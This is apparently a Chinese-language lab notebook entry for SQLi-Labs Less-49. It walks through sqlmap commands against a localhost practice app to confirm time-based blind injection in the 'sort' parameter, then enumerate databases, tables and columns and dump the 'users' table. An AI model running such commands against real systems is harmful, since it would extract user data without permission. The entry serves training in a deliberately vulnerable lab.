SQLI-LAPS 实验记录
Less-49
这一关与上一关类似,也是盲注,页面上没有任何反馈信息,同样我们采用sqlmap工具来帮助进行自动化注入。
首先我们在命令行中输入sqlmap命令:
sql
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch结果如图所示,只有时间盲注方式可以选择,接下来我们继续采用sqlmap自动化注入。
sql
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch --dbs
结果如图所示,页面返回数据库的名称,注入有效。
之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。
- 爆出表名:
php
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security --tables- 爆出列名:
php
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --columns- 爆出内容:
php
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --dump